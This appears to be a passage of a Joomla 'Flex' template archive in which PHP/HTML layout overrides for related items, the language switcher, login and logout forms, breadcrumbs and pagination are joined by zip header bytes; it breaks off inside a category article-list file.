 * @package     Joomla.Site
 * @subpackage  mod_related_items
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */
defined('_JEXEC') or die;
// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$has_lazyload = $tpl_params->get('lazyload', 1);
?>
<?php //echo count($list); ?>
<div class="relateditems <?php echo $moduleclass_sfx; ?> row">
<?php foreach ($list as $item) :	

	$attrbs = json_decode($item->attribs);
	$images = json_decode($item->images);
	$thumb_image = '';
	
	if(isset($images->image_intro) && !empty($images->image_intro)) {
		if(isset($attrbs->spfeatured_image) && !empty($attrbs->spfeatured_image)) {
			$thumb_image = $attrbs->spfeatured_image;
		} else {
			$thumb_image = $images->image_intro;
		}
	} elseif(isset($attrbs->spfeatured_image) && !empty($attrbs->spfeatured_image)) {
		$thumb_image = $attrbs->spfeatured_image;	
	} 

?>
<div class="relateditem col-sm-6" itemscope itemtype="http://schema.org/Article">
	<a href="<?php echo $item->route; ?>" itemprop="url">
        <?php if (!empty($thumb_image)) {?>
                <span class="img-responsive article-list-img">
                    <span class="overlay"></span>
                    <?php 
					if(strpos($thumb_image, 'http://') !== false || strpos($thumb_image, 'https://') !== false){
						if($has_lazyload) { ?>
                        	<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $thumb_image; ?>" alt="<?php echo $item->title; ?>" data-expand="-20">
                    	<?php } else { ?>
                        	<img src="<?php echo $thumb_image; ?>" alt="<?php echo $item->title; ?>">
                        <?php } 
						} else { 
                        if($has_lazyload) { ?>
                        	<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $thumb_image; ?>" alt="<?php echo $item->title; ?>" data-expand="-20">
                    	<?php } else { ?>
                        	<img src="<?php echo $thumb_image; ?>" alt="<?php echo $item->title; ?>">
                        <?php }
						} ?>  
                </span>
            <?php } ?>
            
		<span class="related-articles-title" itemprop="name">
			<?php echo $item->title; ?>
        </span> 
        <?php // echo $item->introtext; ?>
        <?php if ($showDate) echo '<div class="related_date">'.JHTML::_('date', $item->created, JText::_('d F Y H:i')).'</div>'; ?>
        
        </a>
	</div>
<?php endforeach; ?>
</div>
PK!�P�i#flex/html/mod_languages/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_languages
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('stylesheet', 'mod_languages/template.css', array(), false);

if ($params->get('dropdown', 1) && !$params->get('dropdownimage', 0)) {
	JHtml::_('formbehavior.chosen');
}
?>
<div class="mod-languages<?php echo $moduleclass_sfx ?>">
<?php if ($headerText) : ?>
	<div class="pretext"><p><?php echo $headerText; ?></p></div>
<?php endif; ?>

<?php if ($params->get('dropdown', 1) && !$params->get('dropdownimage', 0)) : ?>
	<div class="btn-group">
		<?php foreach ($list as $language) : ?>
			<?php if ($language->active) : ?>
				<?php $flag = ''; ?>
				<?php $flag .=  $language->title_native; ?>
				<a href="#" data-toggle="dropdown" class="dropdown-toggle"><?php echo $flag; ?><i class="pe pe-7s-angle-down"></i></a>
			<?php endif; ?>
		<?php endforeach;?>
		<ul class="<?php echo $params->get('lineheight', 1) ? 'lang-block' : 'lang-block'; ?> dropdown-menu" dir="<?php echo JFactory::getLanguage()->isRtl() ? 'rtl' : 'ltr'; ?>">
		<?php foreach ($list as $language) : ?>
			<?php if ($params->get('show_active', 0) || !$language->active) : ?>
				<li class="<?php echo $language->active ? 'lang-active' : 'no-flag'; ?>" >
				<a href="<?php echo $language->link;?>">
					<?php echo $language->title_native; ?>
				</a>
				</li>
			<?php endif; ?>
		<?php endforeach; ?>
		</ul>
	</div>
<?php elseif ($params->get('dropdown', 1) && $params->get('dropdownimage', 0)) : ?>
	<div class="btn-group">
		<?php foreach ($list as $language) : ?>
			<?php if ($language->active) : ?>
				<?php $flag = ''; ?>
				<?php $flag .= JHtml::_('image', 'mod_languages/' . $language->image . '.gif', $language->title_native, array('title' => $language->title_native), true); ?>
				<?php $flag .=  $language->title_native; ?>
				<a href="#" data-toggle="dropdown" class="dropdown-toggle"><?php echo $flag; ?><i class="pe pe-7s-angle-down"></i></a>
			<?php endif; ?>
		<?php endforeach;?>
		<ul class="<?php echo $params->get('lineheight', 1) ? 'lang-block' : 'lang-block'; ?> dropdown-menu" dir="<?php echo JFactory::getLanguage()->isRtl() ? 'rtl' : 'ltr'; ?>">
		<?php foreach ($list as $language) : ?>
			<?php if ($params->get('show_active', 0) || !$language->active) : ?>
				<li class="<?php echo $language->active ? 'lang-active' : ''; ?>" >
				<a href="<?php echo $language->link;?>">
						<?php echo JHtml::_('image', 'mod_languages/' . $language->image . '.gif', $language->title_native, array('title' => $language->title_native), true); ?>
						<?php echo $language->title_native; ?>
				</a>
				</li>
			<?php endif; ?>
		<?php endforeach; ?>
		</ul>
	</div>
<?php else : ?>
	<ul class="<?php echo $params->get('inline', 1) ? 'lang-inline' : 'lang-block vertical';?>">
	<?php foreach ($list as $language) : ?>
		<?php if ($params->get('show_active', 0) || !$language->active):?>
			<li class="<?php echo $language->active ? 'lang-active' : '';?>" dir="<?php echo JLanguage::getInstance($language->lang_code)->isRtl() ? 'rtl' : 'ltr' ?>">
			<a href="<?php echo $language->link;?>">
			<?php if ($params->get('image', 1)):?>
				
				<?php if ($params->get('inline') == 0) { ?>
                	<?php echo JHtml::_('image', 'mod_languages/' . $language->image . '.gif', $language->title_native, array('title' => $language->title_native), true);?>
                    <span><?php echo ($params->get('full_name', 1)) ? $language->title_native : '' ;?></span>
                    <?php echo $language->active ? '<i class="fa fa-check"></i>' : '';?>
                <?php } else {?>
                <img src="<?php echo 'media/mod_languages/images/' . $language->image . '.gif' ?>" data-toggle="tooltip" data-placement="bottom" title="<?php echo $language->title_native; ?>" alt="<?php echo $language->title_native; ?>" />
                 <?php } ?>
 
			<?php else : ?>
				<p>
					<?php echo ($params->get('full_name', 1)) ? $language->title_native : $language->image; ?>
				</p>
			<?php endif; ?>
			</a>
			</li>
		<?php endif;?>
	<?php endforeach;?>
	</ul>
<?php endif; ?>

<?php if ($footerText) : ?>
	<div class="posttext"><p><?php echo $footerText; ?></p></div>
<?php endif; ?>
</div>
PK!���w��0flex/html/plg_content_pagenavigation/default.phpnu&1i�<?php
/**
 * @package     Joomla.Plugin
 * @subpackage  Content.pagenavigation
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$lang = JFactory::getLanguage(); ?>

<nav role="pagination">
    <ul class="cd-pagination no-space animated-buttons custom-icons">
		<?php if ($row->prev) :
			$direction = $lang->isRTL() ? 'right' : 'left'; ?>
            <li class="button btn-previous">
                <a href="<?php echo $row->prev; ?>" rel="prev"><i><?php echo JText::_('JPREV'); ?></i></a>
            </li>
        <?php endif; ?>
        
       <?php if ($row->next) :
			$direction = $lang->isRTL() ? 'left' : 'right'; ?>
            <li class="button btn-next">
                <a href="<?php echo $row->next; ?>" rel="next"><i><?php echo JText::_('JNEXT'); ?></i></a>
            </li>
        <?php endif; ?>
    </ul>
</nav>
PK!�#o,,/flex/html/plg_content_pagenavigation/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>PK!dx��$�$flex/html/mod_login/modal.phpnu&1i�<?php
/**
* @package		Joomla.Site
* @subpackage	mod_login
* @copyright	Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
* @license		GNU General Public License version 2 or later; see LICENSE.txt
*/

// no direct access
defined('_JEXEC') or die;
require_once JPATH_SITE . '/components/com_users/helpers/route.php';
$doc = JFactory::getDocument();
JHtml::_('behavior.keepalive');
JHtml::_('bootstrap.tooltip');

$user = JFactory::getUser();

?>
<div class="modal-login-wrapper">
	<span class="top-divider"></span>
    <div class="ap-modal-login login">
        <span class="ap-login">
            <a id="modal-<?php echo $module->id; ?>-launch" href="javascript:void(0)" role="button">
                <i class="pe pe-7s-user"></i>
                <span class="info-content">
                <?php echo JText::_('FLEX_LOGIN'); ?>
                </span>
            </a>  
        </span>
        <?php // Flex Modal ?>
        	<div id="fm-<?php echo $module->id; ?>" class="flex-modal modal-login" aria-labelledby="<?php echo $module->id; ?>-ModalLabel" aria-hidden="true" role="dialog" tabindex="-1">
                <div class="flex-modal-content modal-content" role="document">
                     <button type="button" class="fm-<?php echo $module->id; ?>-close fm-close close" aria-label="Close" data-dismiss="flex-modal" aria-hidden="true"><i class="pe pe-7s-close-circle"></i></button>
                    <div class="flex-modal-header modal-header">
                    	<h2 id="<?php echo $module->id; ?>-ModalLabel" class="title">
                        <svg style="margin:-7px 0 0;vertical-align:middle;" width="1.22em" height="1.22em" viewBox="0 0 16 16" class="bi bi-person major_color-lighten-20" fill="currentColor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M13 14s1 0 1-1-1-4-6-4-6 3-6 4 1 1 1 1h10zm-9.995-.944v-.002.002zM3.022 13h9.956a.274.274 0 0 0 .014-.002l.008-.002c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664a1.05 1.05 0 0 0 .022.004zm9.974.056v-.002.002zM8 7a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm3-2a3 3 0 1 1-6 0 3 3 0 0 1 6 0z"/></svg>
                        <?php echo ($user->id>0) ? JText::_('MY_ACCOUNT') : JText::_('JLOGIN'); ?></h2>
                    </div> 
                    <div class="flex-modal-body modal-body">
                    <form action="<?php echo JRoute::_(htmlspecialchars(JUri::getInstance()->toString()), true, $params->get('usesecure')); ?>" method="post" id="modal-login-form">
                            <?php if ($params->get('pretext')): ?>
                                <div class="pretext">
                                    <p><?php echo $params->get('pretext'); ?></p>
                                </div>
                            <?php endif; ?>
                            <fieldset class="userdata">
                                <input id="modallgn-username" placeholder="<?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?>" type="text" name="username" class="input-block-level" required="required"  />
                                <input id="modallgn-passwd" type="password" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD') ?>" name="password" class="input-block-level" required="required" />
                                <?php if (count($twofactormethods) > 1) : ?>
                                <div class="clearfix"></div>
                                <div id="form-login-secretkey" class="control-group">
                                    <div class="controls">
                                        <?php if (!$params->get('usetext')) : ?>
                                            <div class="input-prepend input-append">
                                                <span class="add-on">
                                                    <span class="far fa-star"></span>
                                                        <label for="modallgn-secretkey" class="hidden"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
                                                </span>
                                                <input id="modallgn-secretkey" autocomplete="off" type="text" name="secretkey" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY'); ?>" />
                                                <span class="add-on hasTooltip" title="<?php echo JText::_('JGLOBAL_SECRETKEY_HELP'); ?>">
                                                    <span class="far fa-question-circle"></span>
                                                </span>
                                        </div>
                                        <?php else : ?>
                                        <div class="input-append">
                                            <label for="modallgn-secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
                                            <input id="modallgn-secretkey" autocomplete="off" type="text" name="secretkey" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY'); ?>" />
                                            <span class="add-on hasTooltip" title="<?php echo JText::_('JGLOBAL_SECRETKEY_HELP'); ?>">
                                                <span class="far fa-question-circle"></span>
                                            </span>
                                        </div>
                                        <?php endif; ?>
                                    </div>
                                </div>
                                <?php endif; ?>
                                <div class="clearfix"></div>
                                <?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
                                    <div class="modlgn-remember remember-wrap">
                                        <input id="modallgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
                                        <label for="modallgn-remember"><?php echo JText::_('MOD_LOGIN_REMEMBER_ME') ?></label>
                                    </div>
                                <?php endif; ?>
                                <div class="button-wrap"><input type="submit" name="Submit" class="btn btn-primary sppb-btn-3d btn-xs-block" value="<?php echo JText::_('JLOGIN') ?>" /></div>
                                <div class="forget-name-link btn-xs-block">
                                    <?php echo JText::_('MOD_LOGIN_FORGOT'); ?> <a href="<?php echo JRoute::_('index.php?option=com_users&view=remind'); ?>">
                                    <?php echo JText::_('MOD_LOGIN_FORGOT_USERNAME'); ?></a> <?php echo jText::_('MOD_LOGIN_OR'); ?> <a href="<?php echo JRoute::_('index.php?option=com_users&view=reset'); ?>">
                                    <?php echo JText::_('MOD_LOGIN_FORGOT_PASSWORD'); ?></a> <?php echo JText::_('FLEX_QUESTION_MARK'); ?>
                                </div>
                                <input type="hidden" name="option" value="com_users" />
                                <input type="hidden" name="task" value="user.login" />
                                <input type="hidden" name="return" value="<?php echo $return; ?>" />
                                <?php echo JHtml::_('form.token'); ?>
                            </fieldset>
                            <?php if ($params->get('posttext')): ?>
                                <div class="posttext">
                                    <p><?php echo $params->get('posttext'); ?></p>
                                </div>
                            <?php endif; ?>
                        </form>
                    </div>
                    <?php
					$usersConfig = JComponentHelper::getParams('com_users');
					if ($usersConfig->get('allowUserRegistration')) : ?>
					<div class="modal-footer">
					<?php echo JText::_('MOD_NEW_REGISTER'); ?>
						<a href="<?php echo JRoute::_('index.php?option=com_users&view=registration'); ?>">
							<?php echo JText::_('MOD_LOGIN_REGISTER'); ?>
						</a>
					 </div>
					<?php endif; ?>
                </div>
            </div>
       <?php // END Flex Modal ?>
    </div>
</div>
<?php 
	// Add JS and minify
	$js ='
		setTimeout( function(){
			var modalFlex = document.getElementById("fm-'. $module->id .'");
			var launch_btn = document.getElementById("modal-'. $module->id .'-launch");
			var close_btn = document.getElementsByClassName("fm-'. $module->id .'-close")[0];
		
			function closingdown() {
				modalFlex.classList.remove("open-modal");
			}
			
			launch_btn.addEventListener("click", function(event) {
				modalFlex.classList.add("open-modal");
				
			});
			
			close_btn.addEventListener("click", function(event) {
				 closingdown()
			});
			
			window.addEventListener("click", function(event) {
				if (event.target == modalFlex) {
					closingdown()
				}
			});
			
			
		});	
		';
	$js = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $js); // Remove whitespace
	$doc->addScriptdeclaration($js);

	//Add css
	if (($params->get('pretext') && $params->get('posttext')) || count($twofactormethods) > 1) {
		$style = '.flex-modal .flex-modal-content {top:10vh;}';	
	} else {
		$style = '';	
	}	
	$doc->addStyleDeclaration($style);
?>PK!�$�^��$flex/html/mod_login/modal_logout.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_login
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');

JHtml::_('stylesheet', 'system/frontediting.css', array('version' => 'auto', 'relative' => true));
JHtml::_('script', 'system/frontediting.js', array('version' => 'auto', 'relative' => true));
//Helix3
helix3::addLess('frontend-edit', 'frontend-edit');
helix3::addJS('frontend-edit.js');	
?>
<!-- <span class="top-divider"></span> -->
<div class="ap-modal-login sp-mod-login">
	<div class="ap-my-account-menu dropdown">
		<ul class="ap-my-account">
			<li>
            	<button data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
				  <div class="ap-signin logged-in">
					<div class="signin-img-wrap">
                        <i class="pe pe-7s-user"></i>	
					</div>
					<div class="info-wrap">
						<span class="info-text">
                          <?php if ($params->get('greeting')) : ?>
                            <?php if ($params->get('name') == 0) : ?>
                                <?php echo JText::_('FLEX_LOGIN_HI'); ?>
                                <?php echo htmlspecialchars($user->get('name')); ?>
                            <?php else : ?>
                                <?php echo JText::_('FLEX_LOGIN_HI'); ?>
                                <?php echo htmlspecialchars($user->get('username')); ?>
                            <?php endif; ?>
							<i class="pe pe-7s-angle-down"></i>
                          <?php endif; ?>
						</span>
					 </div>
				   </div>
                </button>
                <div class="dropdown-menu">	
                <?php echo JFactory::getDocument()->getBuffer('modules', 'myaccount', array('style' => 'none')); ?>
                </div>
			</li>
		</ul>
	</div>
</div>PK!
5�--flex/html/mod_login/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_login
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

require_once JPATH_SITE . '/components/com_users/helpers/route.php';

JHtml::_('behavior.keepalive');
JHtml::_('bootstrap.tooltip');

$usersConfig = JComponentHelper::getParams('com_users');

?>
<form action="<?php echo JRoute::_(htmlspecialchars(JUri::getInstance()->toString()), true, $params->get('usesecure')); ?>" method="post" id="login-form">
	<?php if ($params->get('pretext')) : ?>
		<div class="form-group pretext">
			<p><?php echo $params->get('pretext'); ?></p>
		</div>
	<?php endif; ?>
	
	<div id="form-login-username" class="form-group">
		<?php if (!$params->get('usetext')) : ?>
			<div class="input-group">
				<span class="input-group-addon hasTooltip" title="<?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?>">
					<i style="color:#888;text-shadow:1px 1px 0px #fff;width:16px;" class="fa fa-user"></i>
				</span>
				<input id="modlgn-username" type="text" name="username" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?>" />
			</div>
		<?php else: ?>
			<input id="modlgn-username" type="text" name="username" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?>" />
		<?php endif; ?>
	</div>
	<div id="form-login-password" class="form-group">
		<div class="controls">
			<?php if (!$params->get('usetext')) : ?>
				<div class="input-group">
					<span class="input-group-addon hasTooltip" title="<?php echo JText::_('JGLOBAL_PASSWORD') ?>">
						<i style="color:#888;text-shadow:1px 1px 0px #fff;width:16px;" class="fa fa-lock"></i>
					</span>
					<input id="modlgn-passwd" type="password" name="password" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD') ?>" />
				</div>
			<?php else: ?>
				<input id="modlgn-passwd" type="password" name="password" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD') ?>" />
			<?php endif; ?>
		</div>
	</div>
	<?php if (count($twofactormethods) > 1): ?>
	<div id="form-login-secretkey" class="form-group">
		<?php if (!$params->get('usetext')) : ?>
			<div class="input-group">
				<span class="input-group-addon hasTooltip" title="<?php echo JText::_('JGLOBAL_SECRETKEY_HELP'); ?>">
					<i class="fa fa-key"></i>
				</span>
				<input id="modlgn-secretkey" autocomplete="off" type="text" name="secretkey" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY') ?>" />
			</div>
		<?php else: ?>
			<div class="input-group">
				<input id="modlgn-secretkey" autocomplete="off" type="text" name="secretkey" class="form-control" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY') ?>" />
			</div>
		<?php endif; ?>
	</div>
	<?php endif; ?>

	<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
	<div id="form-login-remember" class="form-group">
		<div class="checkbox">
			<input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes" />
            <label for="modlgn-remember"><?php echo JText::_('MOD_LOGIN_REMEMBER_ME') ?></label>
		</div>
	</div>
	<?php endif; ?>

	<div id="form-login-submit" class="form-group">
		<button type="submit" tabindex="0" name="Submit" class="btn btn-success"><?php echo JText::_('JLOGIN') ?></button>
		<?php if ($usersConfig->get('allowUserRegistration')) : ?>
			<a style="margin:10px 0;" class="btn sppb-btn-default" href="<?php echo JRoute::_('index.php?option=com_users&view=registration&Itemid=' . UsersHelperRoute::getRegistrationRoute()); ?>"><i style="margin-left:-5px;margin-right:9px;opacity:0.6;" class="fa fa-user-plus"></i><?php echo JText::_('MOD_LOGIN_REGISTER'); ?></a>
		<?php endif; ?>
	</div>

	<ul class="form-links">
		<li>
			<a style="padding-left:5px;font-size:90%;" href="<?php echo JRoute::_('index.php?option=com_users&view=remind&Itemid=' . UsersHelperRoute::getRemindRoute()); ?>">
			<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_USERNAME'); ?></a>
		</li>
		<li>
			<a style="padding-left:5px;font-size:90%;" href="<?php echo JRoute::_('index.php?option=com_users&view=reset&Itemid=' . UsersHelperRoute::getResetRoute()); ?>">
			<?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_PASSWORD'); ?></a>
		</li>
	</ul>
	
	<input type="hidden" name="option" value="com_users" />
	<input type="hidden" name="task" value="user.login" />
	<input type="hidden" name="return" value="<?php echo $return; ?>" />
	<?php echo JHtml::_('form.token'); ?>

	<?php if ($params->get('posttext')) : ?>
		<div class="posttext form-group">
			<p><?php echo $params->get('posttext'); ?></p>
		</div>
	<?php endif; ?>
</form>
PK!���BB&flex/html/mod_login/default_logout.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_login
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('behavior.keepalive');
?>
<form action="<?php echo JRoute::_(htmlspecialchars(JUri::getInstance()->toString(), ENT_COMPAT, 'UTF-8'), true, $params->get('usesecure')); ?>" method="post" id="login-form">
<?php if ($params->get('greeting')) : ?>
	<div class="login-greeting">
	<?php if ($params->get('name') == 0) : ?>
		<?php echo JText::sprintf('MOD_LOGIN_HINAME', htmlspecialchars($user->get('name'), ENT_COMPAT, 'UTF-8')); ?>
	<?php else : ?>
		<?php echo JText::sprintf('MOD_LOGIN_HINAME', htmlspecialchars($user->get('username'), ENT_COMPAT, 'UTF-8')); ?>
	<?php endif; ?>
	</div>
    <hr />
<?php endif; ?>
	<div class="logout-button">
        <button type="submit" name="Submit" class="btn btn-primary"><i style="margin-left:-3px;margin-right:9px;" class="fa fa-unlock-alt"></i><?php echo JText::_('JLOGOUT'); ?></button>
		<input type="hidden" name="option" value="com_users" />
		<input type="hidden" name="task" value="user.logout" />
		<input type="hidden" name="return" value="<?php echo $return; ?>" />
		<?php echo JHtml::_('form.token'); ?>
	</div>
</form>
PK!CX(�II%flex/html/mod_breadcrumbs/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_breadcrumbs
 *
 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('bootstrap.tooltip');

?>

<ol itemscope itemtype="https://schema.org/BreadcrumbList" class="breadcrumb<?php echo $moduleclass_sfx; ?>">
	<?php
	if ($params->get('showHere', 1)) {
		echo '<span>' . JText::_('MOD_BREADCRUMBS_HERE') . '&#160;</span>';
	} else {
		if (htmlspecialchars($params->get('homeText'), ENT_COMPAT, 'UTF-8') != '') {
			echo '';
		} else {
			echo '<li><i class="fa fa-home"></i></li>';
		}
	}

	// Get rid of duplicated entries on trail including home page when using multilanguage
	for ($i = 0; $i < $count; $i++)
	{
		if ($i === 1 && !empty($list[$i]->link) && !empty($list[$i - 1]->link) && $list[$i]->link === $list[$i - 1]->link)
		{
			unset($list[$i]);
		}
	}

	// Find last and penultimate items in breadcrumbs list
	end($list);
	$last_item_key   = key($list);
	prev($list);
	$penult_item_key = key($list);

	// Make a link if not the last item in the breadcrumbs
	$show_last = $params->get('showLast', 1);
	
	//JPath::clean($separator);
	$lang = JFactory::getLanguage();

		// If a custom separator has not been provided we try to load a template
		// specific one first, and if that is not present we load the default separator

			if ($lang->isRtl())
			{
				$_separator = htmlspecialchars(' \ ', ENT_COMPAT, 'UTF-8');
			}
			else
			{
				$_separator = htmlspecialchars(' / ', ENT_COMPAT, 'UTF-8');
			}
		

		//return $_separator;
	
// Generate the trail
	foreach ($list as $key => $item) :
		if ($key !== $last_item_key) :
			// Render all but last item - along with separator ?>
			<li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
				<?php if (!empty($item->link)) : ?>
					<a itemprop="item" href="<?php echo $item->link; ?>" class="pathway">
                    <span itemprop="name">
					  <?php echo $item->name; ?>
                    </span>
                    </a>
				<?php else : ?>
					<span itemprop="name">
					  <?php echo $item->name; ?>
					</span>
				<?php endif; ?>

                <?php if (($key !== $penult_item_key) || $show_last) : ?>

                    <?php if (htmlspecialchars($params->get('separator'), ENT_COMPAT, 'UTF-8') != '') : ?> 
                    	<span class="text_separator"><?php echo $separator; ?></span>
                    <?php else : ?>
                        <span class="breadcrumb_divider"><?php echo $_separator; ?><span>  
                    <?php endif; ?>
         
				<?php endif; ?>
                  
				<meta itemprop="position" content="<?php echo $key + 1; ?>">
			</li>
		<?php elseif ($show_last) :
			// Render last item if reqd. ?>
			<li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" class="active">
				<span itemprop="name">
					<?php echo $item->name; ?>
				</span>
				<meta itemprop="position" content="<?php echo $key + 1; ?>">
			</li>
		<?php endif;
	endforeach; ?>
</ol>
PK!;���flex/html/pagination.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

function pagination_list_render($list) {
	// Initialize variables
	$html = '<nav role="pagination"><ul class="cd-pagination no-space animated-buttons custom-icons">';
	
	if ($list['start']['active']==1)   $html .= $list['start']['data'];
	if ($list['previous']['active']==1) $html .= $list['previous']['data'];

	foreach ($list['pages'] as $page) {
		$html .= $page['data'];
	}

	if ($list['next']['active']==1) $html .= $list['next']['data'];
	if ($list['end']['active']==1)  $html .= $list['end']['data'];

	$html .= '</ul></nav>';
	
	return $html;
}

function pagination_item_active(&$item) {
	
	$cls = "";
	$buttoncls = "";
	$buttoniconstart = "";
	$buttoniconend = "";
	
    if ($item->text == JText::_("Next")) { $item->text = '<i class="ap-right-2"></i>'; $cls = ' class="next"';}
    if ($item->text == JText::_("Prev")) { $item->text = '<i class="ap-left-2"></i>'; $cls = ' class="previous"';}
    
	if ($item->text == JText::_("First")) { $cls = ' class="first"';}
    if ($item->text == JText::_("Last")) { $cls = ' class="last"';}
	
	if ($item->text == JText::_("Start") || $item->text == JText::_("End")) { $buttoniconstart = '<i>'; $buttoniconend = '</i>';}
	
	if ($item->text == JText::_("Start")) { $buttoncls = ' class="button btn-previous"';}
    if ($item->text == JText::_("End")) { $buttoncls = ' class="button btn-next"';}
	
    return '<li' . $buttoncls . '><a' . $cls . ' href="' . $item->link . '">' . $buttoniconstart . $item->text . $buttoniconend . '</a></li>';
}

function pagination_item_inactive( &$item ) {
	$cls = (int)$item->text > 0 ? 'active': 'disabled';
	return '<li class="' . $cls . '"><a>' . $item->text . '</a></li>';
}
PK!�p�S#S#3flex/html/com_content/category/default_articles.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html');

// Create some shortcuts.
$params		= &$this->item->params;
$n			= count($this->items);
$listOrder	= $this->escape($this->state->get('list.ordering'));
$listDirn	= $this->escape($this->state->get('list.direction'));

// Check for at least one editable article
$isEditable = false;

if (!empty($this->items))
{
	foreach ($this->items as $article)
	{
		if ($article->params->get('access-edit'))
		{
			$isEditable = true;
			break;
		}
	}
}
?>

<?php if (empty($this->items)) : ?>

	<?php if ($this->params->get('show_no_articles', 1)) : ?>
	<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
	<?php endif; ?>

<?php else : ?>

<form action="<?php echo htmlspecialchars(JUri::getInstance()->toString()); ?>" method="post" name="adminForm" id="adminForm" class="form-inline">
	<?php if ($this->params->get('show_headings') || $this->params->get('filter_field') != 'hide' || $this->params->get('show_pagination_limit')) :?>
	<fieldset class="filters btn-toolbar clearfix">
		<?php if ($this->params->get('filter_field') != 'hide') :?>
			<div class="btn-group">
				<label class="filter-search-lbl element-invisible" for="filter-search">
					<?php echo JText::_('COM_CONTENT_' . $this->params->get('filter_field') . '_FILTER_LABEL') . '&#160;'; ?>
				</label>
				<input type="text" name="filter-search" id="filter-search" value="<?php echo $this->escape($this->state->get('list.filter')); ?>" class="inputbox" onchange="document.adminForm.submit();" title="<?php echo JText::_('COM_CONTENT_FILTER_SEARCH_DESC'); ?>" placeholder="<?php echo JText::_('COM_CONTENT_' . $this->params->get('filter_field') . '_FILTER_LABEL'); ?>" />
			</div>
		<?php endif; ?>
		<?php if ($this->params->get('show_pagination_limit')) : ?>
			<div class="btn-group pull-right">
				<label for="limit" class="element-invisible">
					<?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?>
				</label>
				<?php echo $this->pagination->getLimitBox(); ?>
			</div>
		<?php endif; ?>
		<input type="hidden" name="filter_order" value="" />
		<input type="hidden" name="filter_order_Dir" value="" />
		<input type="hidden" name="limitstart" value="" />
		<input type="hidden" name="task" value="" />
	</fieldset>
	<?php endif; ?>

	<table class="category table table-striped table-bordered table-hover">
		<?php
		$headerTitle    = '';
		$headerDate     = '';
		$headerAuthor   = '';
		$headerHits     = '';
		$headerEdit     = '';
		?>
		<?php if ($this->params->get('show_headings')) : ?>
			<?php
